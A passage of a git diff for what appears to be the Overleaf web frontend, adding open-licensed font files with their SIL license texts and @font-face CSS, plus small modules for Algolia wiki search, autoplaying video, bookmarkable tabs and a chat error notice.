+ +4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font +Software shall not be used to promote, endorse or advertise any +Modified Version, except to acknowledge the contribution(s) of the +Copyright Holder(s) and the Author(s) or with their explicit written +permission. + +5) The Font Software, modified or unmodified, in part or in whole, +must be distributed entirely under this license, and must not be +distributed under any other license. The requirement for fonts to +remain under this license does not apply to any document created +using the Font Software. + +TERMINATION +This license becomes null and void if any of the above conditions are +not met. + +DISCLAIMER +THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, +EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF +MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT +OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE +COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, +INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL +DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM +OTHER DEALINGS IN THE FONT SOFTWARE. diff --git a/services/web/frontend/fonts/noto-sans/noto-sans.css b/services/web/frontend/fonts/noto-sans/noto-sans.css new file mode 100644 index 0000000..6e96515 --- /dev/null +++ b/services/web/frontend/fonts/noto-sans/noto-sans.css @@ -0,0 +1,50 @@ +/* Noto Sans - Regular */ +@font-face { + font-family: 'Noto Sans'; + font-style: normal; + font-weight: 400; + font-display: fallback; + src: url('NotoSans-Regular.woff2') format('woff2'); +} + +@font-face { + font-family: 'Noto Sans'; + font-style: italic; + font-weight: 400; + font-display: fallback; + src: url('NotoSans-Italic.woff2') format('woff2'); +} + +/* Noto Sans - Medium */ +@font-face { + font-family: 'Noto Sans'; + font-style: normal; + font-weight: 500; + font-display: fallback; + src: url('NotoSans-Medium.woff2') format('woff2'); +} + +@font-face { + font-family: 'Noto Sans'; + font-style: italic; + font-weight: 500; + font-display: fallback; + src: url('NotoSans-MediumItalic.woff2') format('woff2'); +} + +/* Noto Sans - SemiBold */ +@font-face { + font-family: 'Noto Sans'; + font-style: normal; + font-weight: 600; + font-display: fallback; + src: url('NotoSans-SemiBold.woff2') format('woff2'); +} + +@font-face { + font-family: 'Noto Sans'; + font-style: italic; + font-weight: 600; + font-display: fallback; + src: url('NotoSans-SemiBoldItalic.woff2') format('woff2'); +} diff --git a/services/web/frontend/fonts/noto-serif/NotoSerif-Italic[wght].woff2 b/services/web/frontend/fonts/noto-serif/NotoSerif-Italic[wght].woff2 new file mode 100644 index 0000000..dd6e397 Binary files /dev/null and b/services/web/frontend/fonts/noto-serif/NotoSerif-Italic[wght].woff2 differ diff --git a/services/web/frontend/fonts/noto-serif/NotoSerif[wght].woff2 b/services/web/frontend/fonts/noto-serif/NotoSerif[wght].woff2 new file mode 100644 index 0000000..fec5455 Binary files /dev/null and b/services/web/frontend/fonts/noto-serif/NotoSerif[wght].woff2 differ diff --git a/services/web/frontend/fonts/noto-serif/OFL.txt b/services/web/frontend/fonts/noto-serif/OFL.txt new file mode 100644 index 0000000..6843f31 --- /dev/null +++ b/services/web/frontend/fonts/noto-serif/OFL.txt @@ -0,0 +1,93 @@ +Copyright 2022 The Noto Project Authors 
(https://github.com/notofonts/latin-greek-cyrillic) + +This Font Software is licensed under the SIL Open Font License, Version 1.1. +This license is copied below, and is also available with a FAQ at: +https://scripts.sil.org/OFL + + +----------------------------------------------------------- +SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007 +----------------------------------------------------------- + +PREAMBLE +The goals of the Open Font License (OFL) are to stimulate worldwide +development of collaborative font projects, to support the font creation +efforts of academic and linguistic communities, and to provide a free and +open framework in which fonts may be shared and improved in partnership +with others. + +The OFL allows the licensed fonts to be used, studied, modified and +redistributed freely as long as they are not sold by themselves. The +fonts, including any derivative works, can be bundled, embedded, +redistributed and/or sold with any software provided that any reserved +names are not used by derivative works. The fonts and derivatives, +however, cannot be released under any other type of license. The +requirement for fonts to remain under this license does not apply +to any document created using the fonts or their derivatives. + +DEFINITIONS +"Font Software" refers to the set of files released by the Copyright +Holder(s) under this license and clearly marked as such. This may +include source files, build scripts and documentation. + +"Reserved Font Name" refers to any names specified as such after the +copyright statement(s). + +"Original Version" refers to the collection of Font Software components as +distributed by the Copyright Holder(s). + +"Modified Version" refers to any derivative made by adding to, deleting, +or substituting -- in part or in whole -- any of the components of the +Original Version, by changing formats or by porting the Font Software to a +new environment. + +"Author" refers to any designer, engineer, programmer, technical +writer or other person who contributed to the Font Software. + +PERMISSION & CONDITIONS +Permission is hereby granted, free of charge, to any person obtaining +a copy of the Font Software, to use, study, copy, merge, embed, modify, +redistribute, and sell modified and unmodified copies of the Font +Software, subject to the following conditions: + +1) Neither the Font Software nor any of its individual components, +in Original or Modified Versions, may be sold by itself. + +2) Original or Modified Versions of the Font Software may be bundled, +redistributed and/or sold with any software, provided that each copy +contains the above copyright notice and this license. These can be +included either as stand-alone text files, human-readable headers or +in the appropriate machine-readable metadata fields within text or +binary files as long as those fields can be easily viewed by the user. + +3) No Modified Version of the Font Software may use the Reserved Font +Name(s) unless explicit written permission is granted by the corresponding +Copyright Holder. This restriction only applies to the primary font name as +presented to the users. + +4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font +Software shall not be used to promote, endorse or advertise any +Modified Version, except to acknowledge the contribution(s) of the +Copyright Holder(s) and the Author(s) or with their explicit written +permission. 
+ +5) The Font Software, modified or unmodified, in part or in whole, +must be distributed entirely under this license, and must not be +distributed under any other license. The requirement for fonts to +remain under this license does not apply to any document created +using the Font Software. + +TERMINATION +This license becomes null and void if any of the above conditions are +not met. + +DISCLAIMER +THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, +EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF +MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT +OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE +COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, +INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL +DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM +OTHER DEALINGS IN THE FONT SOFTWARE. diff --git a/services/web/frontend/fonts/noto-serif/noto-serif.css b/services/web/frontend/fonts/noto-serif/noto-serif.css new file mode 100644 index 0000000..316697f --- /dev/null +++ b/services/web/frontend/fonts/noto-serif/noto-serif.css @@ -0,0 +1,15 @@ +@font-face { + font-family: 'Noto Serif'; + font-style: normal; + font-weight: 200 700; + font-stretch: 62.5% 100%; + src: url('NotoSerif[wght].woff2') format('woff2'); +} + +@font-face { + font-family: 'Noto Serif'; + font-style: italic; + font-weight: 200 700; + font-stretch: 62.5% 100%; + src: url('NotoSerif-Italic[wght].woff2') format('woff2'); +} diff --git a/services/web/frontend/fonts/open-dyslexic-mono/OFL.txt b/services/web/frontend/fonts/open-dyslexic-mono/OFL.txt new file mode 100644 index 0000000..bb86782 --- /dev/null +++ b/services/web/frontend/fonts/open-dyslexic-mono/OFL.txt @@ -0,0 +1,94 @@ +Copyright (c) 2019-07-29, Abbie Gonzalez (https://abbiecod.es|support@abbiecod.es), +with Reserved Font Name OpenDyslexic. +Copyright (c) 12/2012 - 2019 +This Font Software is licensed under the SIL Open Font License, Version 1.1. +This license is copied below, and is also available with a FAQ at: +http://scripts.sil.org/OFL + + +----------------------------------------------------------- +SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007 +----------------------------------------------------------- + +PREAMBLE +The goals of the Open Font License (OFL) are to stimulate worldwide +development of collaborative font projects, to support the font creation +efforts of academic and linguistic communities, and to provide a free and +open framework in which fonts may be shared and improved in partnership +with others. + +The OFL allows the licensed fonts to be used, studied, modified and +redistributed freely as long as they are not sold by themselves. The +fonts, including any derivative works, can be bundled, embedded, +redistributed and/or sold with any software provided that any reserved +names are not used by derivative works. The fonts and derivatives, +however, cannot be released under any other type of license. The +requirement for fonts to remain under this license does not apply +to any document created using the fonts or their derivatives. + +DEFINITIONS +"Font Software" refers to the set of files released by the Copyright +Holder(s) under this license and clearly marked as such. This may +include source files, build scripts and documentation. + +"Reserved Font Name" refers to any names specified as such after the +copyright statement(s). 
+ +"Original Version" refers to the collection of Font Software components as +distributed by the Copyright Holder(s). + +"Modified Version" refers to any derivative made by adding to, deleting, +or substituting -- in part or in whole -- any of the components of the +Original Version, by changing formats or by porting the Font Software to a +new environment. + +"Author" refers to any designer, engineer, programmer, technical +writer or other person who contributed to the Font Software. + +PERMISSION & CONDITIONS +Permission is hereby granted, free of charge, to any person obtaining +a copy of the Font Software, to use, study, copy, merge, embed, modify, +redistribute, and sell modified and unmodified copies of the Font +Software, subject to the following conditions: + +1) Neither the Font Software nor any of its individual components, +in Original or Modified Versions, may be sold by itself. + +2) Original or Modified Versions of the Font Software may be bundled, +redistributed and/or sold with any software, provided that each copy +contains the above copyright notice and this license. These can be +included either as stand-alone text files, human-readable headers or +in the appropriate machine-readable metadata fields within text or +binary files as long as those fields can be easily viewed by the user. + +3) No Modified Version of the Font Software may use the Reserved Font +Name(s) unless explicit written permission is granted by the corresponding +Copyright Holder. This restriction only applies to the primary font name as +presented to the users. + +4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font +Software shall not be used to promote, endorse or advertise any +Modified Version, except to acknowledge the contribution(s) of the +Copyright Holder(s) and the Author(s) or with their explicit written +permission. + +5) The Font Software, modified or unmodified, in part or in whole, +must be distributed entirely under this license, and must not be +distributed under any other license. The requirement for fonts to +remain under this license does not apply to any document created +using the Font Software. + +TERMINATION +This license becomes null and void if any of the above conditions are +not met. + +DISCLAIMER +THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, +EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF +MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT +OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE +COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, +INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL +DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM +OTHER DEALINGS IN THE FONT SOFTWARE. 
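Aside: the noto-serif.css file added above registers Noto Serif as a variable font, declaring a weight range (font-weight: 200 700) and a width range (font-stretch: 62.5% 100%) for a single woff2 file. A minimal sketch of how downstream styles can exercise that range; the selector and values are illustrative assumptions, not part of this commit:

    /* any weight inside the registered 200-700 range is interpolated from
       NotoSerif[wght].woff2, with no extra font file to download */
    .review-quote {
      font-family: 'Noto Serif', serif;
      font-weight: 350;
      font-stretch: 87.5%;
    }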
diff --git a/services/web/frontend/fonts/open-dyslexic-mono/OpenDyslexicMono-Regular.woff2 b/services/web/frontend/fonts/open-dyslexic-mono/OpenDyslexicMono-Regular.woff2 new file mode 100644 index 0000000..ebb5140 Binary files /dev/null and b/services/web/frontend/fonts/open-dyslexic-mono/OpenDyslexicMono-Regular.woff2 differ diff --git a/services/web/frontend/fonts/open-dyslexic-mono/open-dyslexic-mono.css b/services/web/frontend/fonts/open-dyslexic-mono/open-dyslexic-mono.css new file mode 100644 index 0000000..299ca06 --- /dev/null +++ b/services/web/frontend/fonts/open-dyslexic-mono/open-dyslexic-mono.css @@ -0,0 +1,7 @@ +@font-face { + font-family: 'OpenDyslexic Mono'; + src: url('./OpenDyslexicMono-Regular.woff2') format('woff2'); + font-style: normal; + font-weight: normal; + ascent-override: 100%; +} diff --git a/services/web/frontend/fonts/open-sans/OFL.txt b/services/web/frontend/fonts/open-sans/OFL.txt new file mode 100644 index 0000000..2e76eef --- /dev/null +++ b/services/web/frontend/fonts/open-sans/OFL.txt @@ -0,0 +1,88 @@ +Copyright 2020 The Open Sans Project Authors (https://github.com/googlefonts/opensans) + +----------------------------------------------------------- +SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007 +----------------------------------------------------------- + +PREAMBLE +The goals of the Open Font License (OFL) are to stimulate worldwide +development of collaborative font projects, to support the font +creation efforts of academic and linguistic communities, and to +provide a free and open framework in which fonts may be shared and +improved in partnership with others. + +The OFL allows the licensed fonts to be used, studied, modified and +redistributed freely as long as they are not sold by themselves. The +fonts, including any derivative works, can be bundled, embedded, +redistributed and/or sold with any software provided that any reserved +names are not used by derivative works. The fonts and derivatives, +however, cannot be released under any other type of license. The +requirement for fonts to remain under this license does not apply to +any document created using the fonts or their derivatives. + +DEFINITIONS +"Font Software" refers to the set of files released by the Copyright +Holder(s) under this license and clearly marked as such. This may +include source files, build scripts and documentation. + +"Reserved Font Name" refers to any names specified as such after the +copyright statement(s). + +"Original Version" refers to the collection of Font Software +components as distributed by the Copyright Holder(s). + +"Modified Version" refers to any derivative made by adding to, +deleting, or substituting -- in part or in whole -- any of the +components of the Original Version, by changing formats or by porting +the Font Software to a new environment. + +"Author" refers to any designer, engineer, programmer, technical +writer or other person who contributed to the Font Software. + +PERMISSION & CONDITIONS +Permission is hereby granted, free of charge, to any person obtaining +a copy of the Font Software, to use, study, copy, merge, embed, +modify, redistribute, and sell modified and unmodified copies of the +Font Software, subject to the following conditions: + +1) Neither the Font Software nor any of its individual components, in +Original or Modified Versions, may be sold by itself. 
+ +2) Original or Modified Versions of the Font Software may be bundled, +redistributed and/or sold with any software, provided that each copy +contains the above copyright notice and this license. These can be +included either as stand-alone text files, human-readable headers or +in the appropriate machine-readable metadata fields within text or +binary files as long as those fields can be easily viewed by the user. + +3) No Modified Version of the Font Software may use the Reserved Font +Name(s) unless explicit written permission is granted by the +corresponding Copyright Holder. This restriction only applies to the +primary font name as presented to the users. + +4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font +Software shall not be used to promote, endorse or advertise any +Modified Version, except to acknowledge the contribution(s) of the +Copyright Holder(s) and the Author(s) or with their explicit written +permission. + +5) The Font Software, modified or unmodified, in part or in whole, +must be distributed entirely under this license, and must not be +distributed under any other license. The requirement for fonts to +remain under this license does not apply to any document created using +the Font Software. + +TERMINATION +This license becomes null and void if any of the above conditions are +not met. + +DISCLAIMER +THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, +EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF +MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT +OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE +COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, +INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL +DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM +OTHER DEALINGS IN THE FONT SOFTWARE. 
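Aside: open-dyslexic-mono.css above sets ascent-override: 100% on the OpenDyslexic Mono face, which normalises the font's tall ascent metric so its line boxes align with surrounding text. A hedged sketch of how the face might be applied; the selector is an assumption, not part of this commit:

    /* opt-in accessible editor font; vertical metrics are already
       normalised by the ascent-override in the @font-face rule */
    .editor--dyslexic-font {
      font-family: 'OpenDyslexic Mono', monospace;
    }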
diff --git a/services/web/frontend/fonts/open-sans/OpenSans-Bold.woff2 b/services/web/frontend/fonts/open-sans/OpenSans-Bold.woff2 new file mode 100644 index 0000000..6d6a299 Binary files /dev/null and b/services/web/frontend/fonts/open-sans/OpenSans-Bold.woff2 differ diff --git a/services/web/frontend/fonts/open-sans/OpenSans-Light.woff2 b/services/web/frontend/fonts/open-sans/OpenSans-Light.woff2 new file mode 100644 index 0000000..2f5ee39 Binary files /dev/null and b/services/web/frontend/fonts/open-sans/OpenSans-Light.woff2 differ diff --git a/services/web/frontend/fonts/open-sans/OpenSans-Regular.woff2 b/services/web/frontend/fonts/open-sans/OpenSans-Regular.woff2 new file mode 100644 index 0000000..23eec57 Binary files /dev/null and b/services/web/frontend/fonts/open-sans/OpenSans-Regular.woff2 differ diff --git a/services/web/frontend/fonts/open-sans/OpenSans-SemiBold.woff2 b/services/web/frontend/fonts/open-sans/OpenSans-SemiBold.woff2 new file mode 100644 index 0000000..13b0ac0 Binary files /dev/null and b/services/web/frontend/fonts/open-sans/OpenSans-SemiBold.woff2 differ diff --git a/services/web/frontend/fonts/open-sans/open-sans.css b/services/web/frontend/fonts/open-sans/open-sans.css new file mode 100644 index 0000000..8b1b52c --- /dev/null +++ b/services/web/frontend/fonts/open-sans/open-sans.css @@ -0,0 +1,24 @@ +@font-face { + font-family: 'Open Sans'; + font-style: normal; + font-weight: 300; + src: url('OpenSans-Light.woff2') format('woff2'); +} +@font-face { + font-family: 'Open Sans'; + font-style: normal; + font-weight: 400; + src: url('OpenSans-Regular.woff2') format('woff2'); +} +@font-face { + font-family: 'Open Sans'; + font-style: normal; + font-weight: 600; + src: url('OpenSans-SemiBold.woff2') format('woff2'); +} +@font-face { + font-family: 'Open Sans'; + font-style: normal; + font-weight: 700; + src: url('OpenSans-Bold.woff2') format('woff2'); +} diff --git a/services/web/frontend/fonts/source-code-pro/LICENSE.md b/services/web/frontend/fonts/source-code-pro/LICENSE.md new file mode 100644 index 0000000..70288a8 --- /dev/null +++ b/services/web/frontend/fonts/source-code-pro/LICENSE.md @@ -0,0 +1,93 @@ +© 2023 Adobe (http://www.adobe.com/), with Reserved Font Name 'Source'. All Rights Reserved. Source is a trademark of Adobe in the United States and/or other countries. + +This Font Software is licensed under the SIL Open Font License, Version 1.1. + +This license is copied below, and is also available with a FAQ at: http://scripts.sil.org/OFL + + +----------------------------------------------------------- +SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007 +----------------------------------------------------------- + +PREAMBLE +The goals of the Open Font License (OFL) are to stimulate worldwide +development of collaborative font projects, to support the font creation +efforts of academic and linguistic communities, and to provide a free and +open framework in which fonts may be shared and improved in partnership +with others. + +The OFL allows the licensed fonts to be used, studied, modified and +redistributed freely as long as they are not sold by themselves. The +fonts, including any derivative works, can be bundled, embedded, +redistributed and/or sold with any software provided that any reserved +names are not used by derivative works. The fonts and derivatives, +however, cannot be released under any other type of license. 
The +requirement for fonts to remain under this license does not apply +to any document created using the fonts or their derivatives. + +DEFINITIONS +"Font Software" refers to the set of files released by the Copyright +Holder(s) under this license and clearly marked as such. This may +include source files, build scripts and documentation. + +"Reserved Font Name" refers to any names specified as such after the +copyright statement(s). + +"Original Version" refers to the collection of Font Software components as +distributed by the Copyright Holder(s). + +"Modified Version" refers to any derivative made by adding to, deleting, +or substituting -- in part or in whole -- any of the components of the +Original Version, by changing formats or by porting the Font Software to a +new environment. + +"Author" refers to any designer, engineer, programmer, technical +writer or other person who contributed to the Font Software. + +PERMISSION & CONDITIONS +Permission is hereby granted, free of charge, to any person obtaining +a copy of the Font Software, to use, study, copy, merge, embed, modify, +redistribute, and sell modified and unmodified copies of the Font +Software, subject to the following conditions: + +1) Neither the Font Software nor any of its individual components, +in Original or Modified Versions, may be sold by itself. + +2) Original or Modified Versions of the Font Software may be bundled, +redistributed and/or sold with any software, provided that each copy +contains the above copyright notice and this license. These can be +included either as stand-alone text files, human-readable headers or +in the appropriate machine-readable metadata fields within text or +binary files as long as those fields can be easily viewed by the user. + +3) No Modified Version of the Font Software may use the Reserved Font +Name(s) unless explicit written permission is granted by the corresponding +Copyright Holder. This restriction only applies to the primary font name as +presented to the users. + +4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font +Software shall not be used to promote, endorse or advertise any +Modified Version, except to acknowledge the contribution(s) of the +Copyright Holder(s) and the Author(s) or with their explicit written +permission. + +5) The Font Software, modified or unmodified, in part or in whole, +must be distributed entirely under this license, and must not be +distributed under any other license. The requirement for fonts to +remain under this license does not apply to any document created +using the Font Software. + +TERMINATION +This license becomes null and void if any of the above conditions are +not met. + +DISCLAIMER +THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, +EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF +MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT +OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE +COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, +INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL +DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM +OTHER DEALINGS IN THE FONT SOFTWARE. 
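Aside: open-sans.css above maps four static files (Light/Regular/SemiBold/Bold) onto one family name, so ordinary font-weight declarations select the correct file. Illustrative only; the selector is an assumption, not part of this commit:

    /* resolves to OpenSans-SemiBold.woff2 via the weight-600 @font-face;
       weights without an exact face (e.g. 500) fall back to the nearest
       registered weight under standard font-matching rules */
    .card-header {
      font-family: 'Open Sans', sans-serif;
      font-weight: 600;
    }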
diff --git a/services/web/frontend/fonts/source-code-pro/SourceCodePro-Regular.ttf.woff2 b/services/web/frontend/fonts/source-code-pro/SourceCodePro-Regular.ttf.woff2 new file mode 100644 index 0000000..40826f1 Binary files /dev/null and b/services/web/frontend/fonts/source-code-pro/SourceCodePro-Regular.ttf.woff2 differ diff --git a/services/web/frontend/fonts/source-code-pro/source-code-pro.css b/services/web/frontend/fonts/source-code-pro/source-code-pro.css new file mode 100644 index 0000000..f7e3cea --- /dev/null +++ b/services/web/frontend/fonts/source-code-pro/source-code-pro.css @@ -0,0 +1,6 @@ +@font-face { + font-family: 'Source Code Pro'; + font-style: normal; + font-weight: 400; + src: url('SourceCodePro-Regular.ttf.woff2') format('woff2'); +} diff --git a/services/web/frontend/js/bootstrap-3.ts b/services/web/frontend/js/bootstrap-3.ts new file mode 100644 index 0000000..2c7b3b8 --- /dev/null +++ b/services/web/frontend/js/bootstrap-3.ts @@ -0,0 +1,4 @@ +import 'bootstrap' +import './features/contact-form' +import './features/bookmarkable-tab/index' +import './features/tooltip/index-bs3' diff --git a/services/web/frontend/js/bootstrap-5.ts b/services/web/frontend/js/bootstrap-5.ts new file mode 100644 index 0000000..b9dc3d8 --- /dev/null +++ b/services/web/frontend/js/bootstrap-5.ts @@ -0,0 +1,3 @@ +import './features/bookmarkable-tab/index-bs5' +import './features/tooltip/index-bs5' +import 'bootstrap-5' diff --git a/services/web/frontend/js/dev-toolbar.ts b/services/web/frontend/js/dev-toolbar.ts new file mode 100644 index 0000000..f973c97 --- /dev/null +++ b/services/web/frontend/js/dev-toolbar.ts @@ -0,0 +1,5 @@ +import importOverleafModules from '../macros/import-overleaf-module.macro' + +if (process.env.NODE_ENV === 'development') { + importOverleafModules('devToolbar') +} diff --git a/services/web/frontend/js/features/algolia-search/search-wiki.js b/services/web/frontend/js/features/algolia-search/search-wiki.js new file mode 100644 index 0000000..9e2a50a --- /dev/null +++ b/services/web/frontend/js/features/algolia-search/search-wiki.js @@ -0,0 +1,43 @@ +import _ from 'lodash' +import AlgoliaSearch from 'algoliasearch' +import getMeta from '../../utils/meta' + +let wikiIdx +export async function searchWiki(...args) { + if (!wikiIdx) { + const algoliaConfig = getMeta('ol-algolia') + const wikiIndex = _.get(algoliaConfig, 'indexes.wiki') + if (wikiIndex) { + const client = AlgoliaSearch(algoliaConfig.appId, algoliaConfig.apiKey) + wikiIdx = client.initIndex(wikiIndex) + } + } + if (!wikiIdx) { + return { hits: [], nbHits: 0, nbPages: 0 } + } + return wikiIdx.search(...args) +} + +export function formatWikiHit(hit) { + const pageUnderscored = hit.pageName.replace(/\s/g, '_') + const pageSlug = encodeURIComponent(pageUnderscored) + const pagePath = hit.kb ? 
'how-to' : 'latex'
+
+  let pageAnchor = ''
+  const rawPageName = hit._highlightResult.pageName.value
+  const sectionName = hit.sectionName
+  let pageName = rawPageName
+  if (sectionName) {
+    pageAnchor = `#${sectionName.replace(/\s/g, '_')}`
+    pageName += ' - ' + sectionName
+  }
+
+  const body = hit._highlightResult.content.value
+  // keep only lines that carry an Algolia highlight (<em>) and drop wiki [edit] links
+  const content = body
+    .split('\n')
+    .filter(line => line.includes('<em>') && !line.includes('[edit]'))
+    .join('\n...\n')
+
+  const url = `/learn/${pagePath}/${pageSlug}${pageAnchor}`
+  return { url, pageName, rawPageName, sectionName, content }
+}
diff --git a/services/web/frontend/js/features/autoplay-video/index.js b/services/web/frontend/js/features/autoplay-video/index.js
new file mode 100644
index 0000000..d706f90
--- /dev/null
+++ b/services/web/frontend/js/features/autoplay-video/index.js
@@ -0,0 +1,56 @@
+function setup(videoEl) {
+  const reducedMotionReduce = window.matchMedia(
+    '(prefers-reduced-motion: reduce)'
+  )
+
+  if (reducedMotionReduce.matches) {
+    // TODO: on Firefox, if the user enters this mode, the video can throw an
+    // error in the console if the user seeks with the seek bar relatively fast:
+    // AbortError: The fetching process for the media resource was aborted by the user agent at the user's request.
+    // This is only a problem in Firefox (tested on macOS); Chrome and Safari are fine.
+    videoEl.setAttribute('controls', '')
+
+    return
+  }
+
+  const DELAY_BEFORE_REPLAY = 15 * 1000
+  // 0.7 will enable the autoplay on the desktop main homepage video for all users
+  const INTERSECTION_THRESHOLD = 0.7
+
+  let videoIsVisible
+
+  videoEl.addEventListener('ended', () => {
+    setTimeout(() => {
+      videoEl.currentTime = 0
+      if (videoIsVisible) {
+        videoEl.play()
+      }
+    }, DELAY_BEFORE_REPLAY)
+  })
+
+  const observer = new IntersectionObserver(
+    function onIntersecting(changes) {
+      for (const change of changes) {
+        if (change.isIntersecting) {
+          videoIsVisible = true
+          if (videoEl.readyState >= videoEl.HAVE_FUTURE_DATA) {
+            if (!videoEl.ended) {
+              videoEl.play()
+            }
+          } else {
+            videoEl.play()
+          }
+        } else {
+          videoIsVisible = false
+        }
+      }
+    },
+    {
+      threshold: INTERSECTION_THRESHOLD,
+    }
+  )
+
+  observer.observe(videoEl)
+}
+
+document.querySelectorAll('[data-ol-autoplay-video]').forEach(setup)
diff --git a/services/web/frontend/js/features/bookmarkable-tab/index-bs5.ts b/services/web/frontend/js/features/bookmarkable-tab/index-bs5.ts
new file mode 100644
index 0000000..51f4392
--- /dev/null
+++ b/services/web/frontend/js/features/bookmarkable-tab/index-bs5.ts
@@ -0,0 +1,30 @@
+import { Tab } from 'bootstrap-5'
+
+function bookmarkableTab(tabEl: HTMLElement) {
+  tabEl.addEventListener('click', () => {
+    window.location.hash = tabEl.getAttribute('href') as string
+  })
+}
+
+function handleHashChange() {
+  const hash = window.location.hash
+  if (!hash) return
+
+  // Find the bookmarkable tab that links to the hash
+  const tabEl = document.querySelector(
+    `[data-ol-bookmarkable-tab][href="${hash}"]`
+  )
+
+  if (!tabEl) return
+
+  // Select the tab via Bootstrap 5
+  const tab = new Tab(tabEl)
+  tab.show()
+}
+
+document
+  .querySelectorAll('[data-ol-bookmarkable-tab]')
+  .forEach(tabEl => bookmarkableTab(tabEl as HTMLElement))
+
+window.addEventListener('hashchange', handleHashChange)
+handleHashChange()
diff --git a/services/web/frontend/js/features/bookmarkable-tab/index.js b/services/web/frontend/js/features/bookmarkable-tab/index.js
new file mode 100644
index 0000000..76855e9
--- /dev/null
+++ b/services/web/frontend/js/features/bookmarkable-tab/index.js
@@ -0,0 +1,21 @@
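+// Bootstrap 3 variant of the bookmarkable tabs. It relies on the global
+// jQuery `$` and the jQuery tab plugin, whereas index-bs5.ts above does the
+// same job through the Bootstrap 5 Tab API without jQuery.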
+function bookmarkableTab(tabEl) {
+  tabEl.addEventListener('click', () => {
+    window.location.hash = tabEl.getAttribute('href')
+  })
+}
+
+function handleHashChange() {
+  const hash = window.location.hash
+  if (!hash) return
+
+  // Find the bookmarkable tab that links to the hash
+  const $tabEl = $(`[data-ol-bookmarkable-tab][href="${hash}"]`)
+  if (!$tabEl) return
+
+  // Select the tab via Bootstrap
+  $tabEl.tab('show')
+}
+
+document.querySelectorAll('[data-ol-bookmarkable-tab]').forEach(bookmarkableTab)
+window.addEventListener('hashchange', handleHashChange)
+handleHashChange()
diff --git a/services/web/frontend/js/features/chat/components/chat-fallback-error.tsx b/services/web/frontend/js/features/chat/components/chat-fallback-error.tsx
new file mode 100644
index 0000000..b572722
--- /dev/null
+++ b/services/web/frontend/js/features/chat/components/chat-fallback-error.tsx
@@ -0,0 +1,28 @@
+import { useTranslation } from 'react-i18next'
+import OLNotification from '@/features/ui/components/ol/ol-notification'
+import OLButton from '@/features/ui/components/ol/ol-button'
+
+interface ChatFallbackErrorProps {
+  reconnect?: () => void
+}
+
+function ChatFallbackError({ reconnect }: ChatFallbackErrorProps) {
+  const { t } = useTranslation()
+
+  return (
+    <aside className="chat">
+      <OLNotification
+        type="error"
+        content={t('chat_error')}
+        action={
+          reconnect && (
+            <OLButton variant="secondary" size="sm" onClick={reconnect}>
+              {t('reconnect')}
+            </OLButton>
+          )
+        }
+      />
+    </aside>
+  )
+}
+
+export default ChatFallbackError
